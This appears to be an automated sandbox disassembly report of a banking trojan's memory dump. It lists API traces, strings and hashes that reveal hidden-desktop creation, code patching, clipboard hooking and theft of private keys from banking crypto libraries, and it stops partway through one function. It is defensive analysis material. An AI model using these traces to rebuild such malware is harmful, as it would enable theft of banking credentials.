ReleaseMutex.KERNEL32(00000000), ref: 02D0BBE4
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D0BBEF
OpenFileMappingA.KERNEL32(000F001F,00000000,02D4F54C), ref: 02D0BBFD
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02D0BC10
ReleaseMutex.KERNEL32(00000000), ref: 02D0BC25
OpenEventA.KERNEL32(001F0003,00000000,02D4F5DC), ref: 02D0BC33
GetTickCount.KERNEL32 ref: 02D0BC3E
LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02D0BC52
GetProcAddress.KERNEL32(00000000,DefWindowProcW), ref: 02D0BC8C
GetProcAddress.KERNEL32(00000000,DefWindowProcA), ref: 02D0BCAC
GetProcAddress.KERNEL32(00000000,DefDlgProcW), ref: 02D0BCCC
GetProcAddress.KERNEL32(00000000,DefDlgProcA), ref: 02D0BCEC
GetProcAddress.KERNEL32(00000000,DefFrameProcW), ref: 02D0BD0C
GetProcAddress.KERNEL32(00000000,DefFrameProcA), ref: 02D0BD2C
GetProcAddress.KERNEL32(00000000,DefMDIChildProcW), ref: 02D0BD4C
GetProcAddress.KERNEL32(00000000,DefMDIChildProcA), ref: 02D0BD6C
GetProcAddress.KERNEL32(00000000,CallWindowProcW), ref: 02D0BD8C

Part of subcall function 02D1A040: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7591F550,00000000,75A7BD50,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A078
Part of subcall function 02D1A040: memcpy.MSVCRT ref: 02D1A0A0
Part of subcall function 02D1A040: VirtualProtect.KERNEL32(00000000,?,00000040,02D1938A,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A135
Part of subcall function 02D1A040: VirtualProtect.KERNEL32(?,00000000,00000040,02D1938A,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A14A

GetProcAddress.KERNEL32(00000000,CallWindowProcA), ref: 02D0BDAC

Part of subcall function 02D1A040: VirtualProtect.KERNEL32(?,00000000,02D1938A,?,?,?,00000000,00000000,?,?,?,?,?,?,02D1938A,00000000), ref: 02D1A17A
Part of subcall function 02D1A040: VirtualProtect.KERNEL32(?,00000000,02D1938A,?,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A186
Part of subcall function 02D1A040: GetCurrentProcess.KERNEL32(00000000,00000000,7591F550,00000000,75A7BD50,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A197
Part of subcall function 02D1A040: FlushInstructionCache.KERNEL32(00000000,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A19E

GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 02D0BDCC
GetProcAddress.KERNEL32(00000000,RegisterClassA), ref: 02D0BDEC
GetProcAddress.KERNEL32(00000000,RegisterClassExA), ref: 02D0BE0C
GetProcAddress.KERNEL32(00000000,RegisterClassExW), ref: 02D0BE2C
GetProcAddress.KERNEL32(00000000,PeekMessageW), ref: 02D0BE4C
GetProcAddress.KERNEL32(00000000,PeekMessageA), ref: 02D0BE6C
GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 02D0BE8C
GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 02D0BEAC
GetProcAddress.KERNEL32(00000000,OpenDesktopW), ref: 02D0BECC
GetProcAddress.KERNEL32(00000000,SwitchDesktop), ref: 02D0BEEC
GetProcAddress.KERNEL32(00000000,MessageBeep), ref: 02D0BF0C
GetProcAddress.KERNEL32(00000000,FlashWindowEx), ref: 02D0BF2C
GetProcAddress.KERNEL32(00000000,GetCursorPos), ref: 02D0BF4C
GetProcAddress.KERNEL32(00000000,SetCursorPos), ref: 02D0BF6C
GetProcAddress.KERNEL32(00000000,GetMessagePos), ref: 02D0BF8C
GetProcAddress.KERNEL32(00000000,SetCapture), ref: 02D0BFAC
GetProcAddress.KERNEL32(00000000,ReleaseCapture), ref: 02D0BFCC
GetProcAddress.KERNEL32(00000000,GetCapture), ref: 02D0BFEC
LoadLibraryExA.KERNEL32(Winmm.dll,00000000,00000000,00000000,02D0B880,02D4EB4C), ref: 02D0C013
GetProcAddress.KERNEL32(00000000,PlaySoundW), ref: 02D0C025
GetProcAddress.KERNEL32(00000000,PlaySoundA), ref: 02D0C045
GetProcAddress.KERNEL32(00000000,sndPlaySoundW), ref: 02D0C065
GetProcAddress.KERNEL32(00000000,sndPlaySoundA), ref: 02D0C085
LoadLibraryExA.KERNEL32(Kernel32.dll,00000000,00000000,00000000,02D0B470,02D4EB64), ref: 02D0C0A4
GetProcAddress.KERNEL32(00000000,Beep), ref: 02D0C0B0
LoadLibraryExA.KERNEL32(Gdi32.dll,00000000,00000000,00000000,02D0B4B0,02D4EB78), ref: 02D0C0CF
GetProcAddress.KERNEL32(00000000,SetDIBitsToDevice), ref: 02D0C0DB

Strings

DefMDIChildProcW, xrefs: 02D0BD46
GetMessagePos, xrefs: 02D0BF86
ReleaseCapture, xrefs: 02D0BFC6
DefWindowProcA, xrefs: 02D0BCA6
MessageBeep, xrefs: 02D0BF06
DefWindowProcW, xrefs: 02D0BC86
Winmm.dll, xrefs: 02D0C00E
Kernel32.dll, xrefs: 02D0C09F
PeekMessageA, xrefs: 02D0BE66
PeekMessageW, xrefs: 02D0BE46
RegisterClassExA, xrefs: 02D0BE06
a3b7feb4a, xrefs: 02D0BA72, 02D0BB28
PlaySoundA, xrefs: 02D0C03F
Beep, xrefs: 02D0C0AA
PlaySoundW, xrefs: 02D0C01F
RegisterClassExW, xrefs: 02D0BE26
Gdi32.dll, xrefs: 02D0C0CA
DefDlgProcW, xrefs: 02D0BCC6
CallWindowProcA, xrefs: 02D0BDA6
GetCursorPos, xrefs: 02D0BF46
DefDlgProcA, xrefs: 02D0BCE6
GetCapture, xrefs: 02D0BFE6
FlashWindowEx, xrefs: 02D0BF26
RegisterClassA, xrefs: 02D0BDE6
sndPlaySoundW, xrefs: 02D0C05F
SetCursorPos, xrefs: 02D0BF66
SetCapture, xrefs: 02D0BFA6
SwitchDesktop, xrefs: 02D0BEE6
sndPlaySoundA, xrefs: 02D0C07F
SetDIBitsToDevice, xrefs: 02D0C0D5
DefMDIChildProcA, xrefs: 02D0BD66
RegisterClassW, xrefs: 02D0BDC6
user32.dll, xrefs: 02D0BC48
DefFrameProcW, xrefs: 02D0BD06
OpenInputDesktop, xrefs: 02D0BE86
DefFrameProcA, xrefs: 02D0BD26
CallWindowProcW, xrefs: 02D0BD86
OpenDesktopW, xrefs: 02D0BEC6
OpenDesktopA, xrefs: 02D0BEA6

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$FileOpen$Virtualwsprintf$LibraryLoadMutexProtect$CurrentMappingObjectView$HandleInformationProcessReleaseSingleSleepThreadWait$AllocCacheCloseComputerCountCreateDesktopEventFlushHeapInstructionMessageNameRegisterTickUserWindowlstrcmpilstrlenmemcpy
String ID: Beep$CallWindowProcA$CallWindowProcW$DefDlgProcA$DefDlgProcW$DefFrameProcA$DefFrameProcW$DefMDIChildProcA$DefMDIChildProcW$DefWindowProcA$DefWindowProcW$FlashWindowEx$Gdi32.dll$GetCapture$GetCursorPos$GetMessagePos$Kernel32.dll$MessageBeep$OpenDesktopA$OpenDesktopW$OpenInputDesktop$PeekMessageA$PeekMessageW$PlaySoundA$PlaySoundW$RegisterClassA$RegisterClassExA$RegisterClassExW$RegisterClassW$ReleaseCapture$SetCapture$SetCursorPos$SetDIBitsToDevice$SwitchDesktop$Winmm.dll$a3b7feb4a$sndPlaySoundA$sndPlaySoundW$user32.dll
API String ID: 1664322764-1283114219
Opcode ID: efebd51d8794fe147799089b21ef5eae60c707380196acad98895e2a5d32a7a8
Instruction ID: 8d3596dbbdccba4441541965d5b4ffec28d8c68164bf8b0acc9758121e9a63bd
Opcode Fuzzy Hash: efebd51d8794fe147799089b21ef5eae60c707380196acad98895e2a5d32a7a8
Instruction Fuzzy Hash: C4D15574BC1306B7FA206B727CD6F5B2B9C6B14A88F2409127903B17D5DEA8EC49C974

Function 02D15230 Relevance: 114.1, APIs: 43, Strings: 22, Instructions: 302libraryloaderthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D15251
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7591F550,74E17390,75920A60), ref: 02D15267
AddVectoredExceptionHandler.KERNEL32(00000001,02D03AE0), ref: 02D15274
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02D1528F
CreateThread.KERNEL32(00000000,00000000,02D1A2B0,00000000,00000000,00000000), ref: 02D152A9
GetHandleInformation.KERNEL32(00000000,?), ref: 02D152C1
CloseHandle.KERNEL32(00000000), ref: 02D152D2
InitializeCriticalSection.KERNEL32(02D4FB50), ref: 02D152E3
LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02D152F9
GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02D1530B
LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02D1532A
GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02D15338
GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02D15354
GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02D15370
InitializeCriticalSection.KERNEL32(02D4FB38), ref: 02D1538B
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02D15392
GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02D153A2
GetCurrentProcessId.KERNEL32(00000000,02D07760,02D59E88), ref: 02D153B8
GetCurrentThreadId.KERNEL32 ref: 02D153D3
GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02D153E8
GetUserObjectInformationA.USER32(00000000), ref: 02D153EF
lstrcmpiA.KERNEL32(?,a3b7feb4a), ref: 02D15401
LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02D1541B
GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 02D1542B
GetCurrentProcessId.KERNEL32(00000000,02D0B930,02D4EB74), ref: 02D15441
GetCurrentThreadId.KERNEL32 ref: 02D15450
GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02D15465
GetUserObjectInformationA.USER32(00000000), ref: 02D1546C
lstrcmpiA.KERNEL32(?,a3b7feb4a), ref: 02D1547E
StrStrIA.SHLWAPI(00000000,java), ref: 02D154B2
StrStrIA.SHLWAPI(00000000,.exe), ref: 02D154C4
StrStrIA.SHLWAPI(00000000,frd.exe), ref: 02D154DA
LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02D154F1
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02D154FF
GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02D1551B
GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02D15537
InitializeCriticalSection.KERNEL32(02D4FB20), ref: 02D15552
LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02D1557F
GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02D1558B
LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02D155AA
GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02D155B6
LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02D155D5
GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02D155E1

Strings

vb_pfx_import, xrefs: 02D15585
AddPSEPrivateKeyEx, xrefs: 02D155DB
ws2_32.dll, xrefs: 02D154EC
SetThreadDesktop, xrefs: 02D15425
ZwQuerySystemInformation, xrefs: 02D1539C
GetMessageW, xrefs: 02D1536A
ntdll.dll, xrefs: 02D1538D
GetClipboardData, xrefs: 02D15305
mespro.dll, xrefs: 02D155D0
a3b7feb4a, xrefs: 02D153F5, 02D15472
gethostbyname, xrefs: 02D15515
RCN_R50Buffer, xrefs: 02D155B0
user32.dll, xrefs: 02D152F4, 02D15325, 02D15416
TranslateMessage, xrefs: 02D15332
java, xrefs: 02D154A6
sks2xyz.dll, xrefs: 02D1557A
getaddrinfo, xrefs: 02D154F9
GetMessageA, xrefs: 02D1534E
frd.exe, xrefs: 02D154CE
.exe, xrefs: 02D154B8
FilialRCon.dll, xrefs: 02D155A5
inet_addr, xrefs: 02D15531

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
String ID: .exe$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$a3b7feb4a$frd.exe$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
API String ID: 1248150503-2514233154
Opcode ID: d15c6664f98fa912d60a3f2eb5337aca0d9d44c6a94f0e7c1391e0efb71eebe3
Instruction ID: 4b1bbf0b6b1159e3903423ee4982be94c03dcf003c9e78eaadfc4ac5a63c7587
Opcode Fuzzy Hash: d15c6664f98fa912d60a3f2eb5337aca0d9d44c6a94f0e7c1391e0efb71eebe3
Instruction Fuzzy Hash: 7291AD75BC03157BFA20ABB1BC4AF5A27989B54B44F940510B902F6B85DFE8ED08CA74

Function 02D0D130 Relevance: 101.9, APIs: 55, Strings: 3, Instructions: 429windowsynchronizationmemoryCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 02D0D18F
SetWindowLongA.USER32(?,000000F0,00000000), ref: 02D0D19A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02D0D1AD
GetDlgItem.USER32(?,?), ref: 02D0D1C2
GetWindowLongA.USER32(00000000,000000EB), ref: 02D0D1D1
SetWindowTextA.USER32(?,-00000008), ref: 02D0D1DD
GetWindowLongA.USER32(00000000,000000F0), ref: 02D0D1EC
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02D0D1F7
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02D0D20A
GetDlgItem.USER32(?,000003E9), ref: 02D0D248
GetClassLongA.USER32(00000000,000000E6), ref: 02D0D258
SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02D0D267
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 02D0D27F
GetObjectA.GDI32(00000000,0000003C,?), ref: 02D0D289
CreateFontIndirectA.GDI32 ref: 02D0D29F
SendMessageA.USER32(?,00000030,00000000,00000000), ref: 02D0D2AF
GetWindow.USER32(00000000,00000005), ref: 02D0D2E7
GetWindow.USER32(00000000), ref: 02D0D2EA
GetWindowInfo.USER32(00000000,?), ref: 02D0D2FE
GetWindowRect.USER32(?,?), ref: 02D0D363
SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 02D0D38D
GetClientRect.USER32(?,?), ref: 02D0D399
MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 02D0D3B5
CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 02D0D3DA
SetWindowLongA.USER32(00000000,000000F4,?), ref: 02D0D3EC
GetClassLongA.USER32(00000000,000000E6), ref: 02D0D3F5
SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02D0D404
GetWindowTextLengthA.USER32(00000000), ref: 02D0D40B
HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 02D0D41F
SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 02D0D443
SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 02D0D450
GetWindowThreadProcessId.USER32(00000000,?), ref: 02D0D460
GetClassLongA.USER32(00000000,000000DE), ref: 02D0D47C
GetClassLongA.USER32(00000000,000000F2), ref: 02D0D485
LoadIconA.USER32(00000000,00007F00), ref: 02D0D491
SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 02D0D4AB
GetWindowLongA.USER32(00000000,000000F0), ref: 02D0D4D4
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02D0D4E3
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02D0D4F6
GetWindow.USER32(00000000,00000003), ref: 02D0D519
IsIconic.USER32(?), ref: 02D0D537
ShowWindow.USER32(?,00000001), ref: 02D0D544
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D0D553
ReleaseMutex.KERNEL32(00000000), ref: 02D0D56B

Part of subcall function 02D0D0E0: GetWindowThreadProcessId.USER32(?,00000000), ref: 02D0D0EC
Part of subcall function 02D0D0E0: GetCurrentThreadId.KERNEL32 ref: 02D0D0F4
Part of subcall function 02D0D0E0: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02D0D100
Part of subcall function 02D0D0E0: SendMessageA.USER32(?,0000000D,?,?), ref: 02D0D111
Part of subcall function 02D0D0E0: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02D0D11D

PostMessageA.USER32(?,00000010,00000000,00000000), ref: 02D0D578
GetDlgItem.USER32(?,?), ref: 02D0D5E7
GetWindowLongA.USER32(00000000), ref: 02D0D5EE
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D0D5FE
ReleaseMutex.KERNEL32(00000000), ref: 02D0D618
GetDlgItem.USER32(?,00000000), ref: 02D0D62D
GetWindowLongA.USER32(00000000,000000EB), ref: 02D0D63C
DeleteObject.GDI32(?), ref: 02D0D648
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02D0D657
DestroyWindow.USER32(00000000), ref: 02D0D65E
EndDialog.USER32(?,00000000), ref: 02D0D673

Strings

static, xrefs: 02D0D3D3
<, xrefs: 02D0D2F6
', xrefs: 02D0D500

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
String ID: '$<$static
API String ID: 2592195760-1233416523
Opcode ID: 3ac3f34be8511b5b119ffe572b6b7f56ba7f8e261cb12efba26d0d7145a7decc
Instruction ID: f3ea9c4b2205d511f2bf0ae944b97fd4e41cecde1cd8e87db370f5723901dd2b
Opcode Fuzzy Hash: 3ac3f34be8511b5b119ffe572b6b7f56ba7f8e261cb12efba26d0d7145a7decc
Instruction Fuzzy Hash: F7E19279984300AFD3208FA4EC88F6A77E9EB99725F904A09F915EB3D0C7749C51CB61

Function 02D09360 Relevance: 80.8, APIs: 41, Strings: 5, Instructions: 320sleepprocessthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 02D24B30: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,00000000,00000101,?), ref: 02D24B60
Part of subcall function 02D24B30: GetProcessHeap.KERNEL32(00000008,00000110), ref: 02D24B79
Part of subcall function 02D24B30: HeapAlloc.KERNEL32(00000000), ref: 02D24B7C
Part of subcall function 02D24B30: memset.MSVCRT ref: 02D24B90
Part of subcall function 02D24B30: RegQueryValueExA.ADVAPI32(?,Shell,00000000,00000001,00000000,00000104), ref: 02D24BB0
Part of subcall function 02D24B30: RegCloseKey.ADVAPI32(?), ref: 02D24BC0
Part of subcall function 02D24B30: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D24BD1
Part of subcall function 02D24B30: HeapValidate.KERNEL32(00000000), ref: 02D24BD4
Part of subcall function 02D24B30: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D24BE1
Part of subcall function 02D24B30: HeapFree.KERNEL32(00000000), ref: 02D24BE4

CreateDesktopA.USER32 ref: 02D093BF
SetThreadDesktop.USER32(00000000), ref: 02D093DA
memset.MSVCRT ref: 02D093E8
SHGetFolderPathA.SHELL32 ref: 02D09420
PathAppendA.SHLWAPI(?,00000000), ref: 02D09442
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 02D09461
GetShellWindow.USER32 ref: 02D0946D
Sleep.KERNEL32(0000000A), ref: 02D09482
GetShellWindow.USER32 ref: 02D09484
GetHandleInformation.KERNEL32(?,000000FF), ref: 02D094B1
CloseHandle.KERNEL32(?), ref: 02D094C3
GetHandleInformation.KERNEL32(00000000,000000FF), ref: 02D094DD
CloseHandle.KERNEL32(00000000), ref: 02D094EF
GetDesktopWindow.USER32 ref: 02D094F5
FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 02D09506
SetThreadDesktop.USER32(?), ref: 02D0959E
memset.MSVCRT ref: 02D095AF
SHGetFolderPathA.SHELL32 ref: 02D095ED
PathAppendA.SHLWAPI(?,00000000), ref: 02D0960F
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 02D09631
GetShellWindow.USER32 ref: 02D0963D
Sleep.KERNEL32(0000000A), ref: 02D09652
GetShellWindow.USER32 ref: 02D09654
GetHandleInformation.KERNEL32(?,00000024), ref: 02D09683
CloseHandle.KERNEL32(?), ref: 02D09691
GetHandleInformation.KERNEL32(?,00000024), ref: 02D096AB
CloseHandle.KERNEL32(?), ref: 02D096B9
GetDesktopWindow.USER32 ref: 02D096BF

Strings

D, xrefs: 02D09410
Shell_TrayWnd, xrefs: 02D094FC, 02D096C6
D, xrefs: 02D095D7
a3b7feb4a, xrefs: 02D093AA, 02D09418, 02D0950C, 02D095E2
explorer.exe, xrefs: 02D09434, 02D09439, 02D09601, 02D09606

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Window$Heap$CloseDesktopProcess$InformationPathShell$Creatememset$AppendFolderSleepThread$AllocFindFreeOpenQueryValidateValue
String ID: D$D$Shell_TrayWnd$a3b7feb4a$explorer.exe
API String ID: 3365957849-1320494549
Opcode ID: 25377f65ede9344564b50cbeeefb0eef058c88b3fc1661f27e9b873cda6a6d43
Instruction ID: 3289a26ea51e053fe0d5236e2e7dd29c383242d5fdd3e325c7c6768d839dba38
Opcode Fuzzy Hash: 25377f65ede9344564b50cbeeefb0eef058c88b3fc1661f27e9b873cda6a6d43
Instruction Fuzzy Hash: D6B1ADB5940341AFD7109F64A8D8BAB7BE8BB88658F404D2DF989C2390D7B49C14CF61

Function 02D227C0 Relevance: 63.4, APIs: 27, Strings: 9, Instructions: 376COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D227DE
memset.MSVCRT ref: 02D227F8
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02D22822
PathAddBackslashA.SHLWAPI(5C5901AC), ref: 02D22847
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02D22887
GetLastError.KERNEL32 ref: 02D22891
IsUserAnAdmin.SHELL32 ref: 02D22899
PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02D228AA
SetLastError.KERNEL32(00000000), ref: 02D228B1
GetFileAttributesA.KERNEL32(00000000), ref: 02D228F4
SetCurrentDirectoryA.KERNEL32(00000000), ref: 02D22940
PathAddBackslashA.SHLWAPI(5C5901AC,00000000,00000000), ref: 02D22987

Strings

client.zip, xrefs: 02D228C8
\SIGN1\, xrefs: 02D22A9B
\, xrefs: 02D22919
5C5901AC, xrefs: 02D22842, 02D2284D, 02D22982, 02D2298D, 02D22AC2, 02D22ACD, 02D22B72, 02D22B7D
keys.zip, xrefs: 02D22B18
path_client.txt, xrefs: 02D229CB
\t, xrefs: 02D22847, 02D22987, 02D22AC7, 02D22B77
path_keys.txt, xrefs: 02D22BBB
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D22C09

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
String ID: 5C5901AC$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt$\t
API String ID: 1576442920-3984120252
Opcode ID: 0d31358d0b87f8d41b69599a93b23f22d8974175e1fd6eb2aa5076e84f8a03a1
Instruction ID: 085898cdbf69314f56d9e7cbaff334a4c2c0b52b978f1f28518dd1df6ea02feb
Opcode Fuzzy Hash: 0d31358d0b87f8d41b69599a93b23f22d8974175e1fd6eb2aa5076e84f8a03a1
Instruction Fuzzy Hash: 72D122349482658FDB218F24A86CBEA7BE5EF65308F148595ECC5DB340DB719E8CCB90

Function 02D23B90 Relevance: 58.1, APIs: 24, Strings: 9, Instructions: 364sleepCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,02D4A918), ref: 02D23BA8
Sleep.KERNEL32(000003E8), ref: 02D23BB9
FindWindowW.USER32(00000000,02D4A918), ref: 02D23BC2
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D23BD6
StrStrIA.SHLWAPI(?,core.exe), ref: 02D23BEE
PathFileExistsA.SHLWAPI(?), ref: 02D23C19
StrStrIA.SHLWAPI(?,\data\id.dbf), ref: 02D23C4F
PathAddBackslashA.SHLWAPI(02D5D19C), ref: 02D23C77
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D23CB5
GetLastError.KERNEL32 ref: 02D23CBF
IsUserAnAdmin.SHELL32 ref: 02D23CC7
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D23CD8
SetLastError.KERNEL32(00000000), ref: 02D23CDF

Strings

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}, xrefs: 02D23FEC
path%i.txt, xrefs: 02D23E69
path.txt, xrefs: 02D23FAD
\data\id.dbf, xrefs: 02D23C43
core.exe, xrefs: 02D23BE2
keys.zip, xrefs: 02D23F1B
\t, xrefs: 02D23C77, 02D23D77, 02D23E17, 02D23ED7, 02D23F69
data\id.dbf, xrefs: 02D23BF8
keys%i.zip, xrefs: 02D23DC7

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$ErrorFileFindLastWindow$AdminBackslashCreateDirectoryExistsFolderMakeModuleNameSleepSystemUser
String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$\data\id.dbf$core.exe$data\id.dbf$keys%i.zip$keys.zip$path%i.txt$path.txt$\t
API String ID: 109093349-1979414145
Opcode ID: 79618e09da78164f3b7b9664c066bc5c4b23804891439f05e5cd7febef7de7ee
Instruction ID: f2f819aaf91fb36b3a9bc49b57195fccfb32b445fda70c00340d113fee3b7520
Opcode Fuzzy Hash: 79618e09da78164f3b7b9664c066bc5c4b23804891439f05e5cd7febef7de7ee
Instruction Fuzzy Hash: 20C14B34A0426A9FDB16CF38A868BEA7BE5AF59304F5449D4E886D7340DB70DD4CCB90

Function 02D1E1B0 Relevance: 58.1, APIs: 24, Strings: 9, Instructions: 346fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D1E1CF
memset.MSVCRT ref: 02D1E1F1
GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02D1E206
SetErrorMode.KERNEL32(00000001), ref: 02D1E21F
GetDriveTypeA.KERNEL32(?), ref: 02D1E268
SetCurrentDirectoryA.KERNEL32(?), ref: 02D1E27B
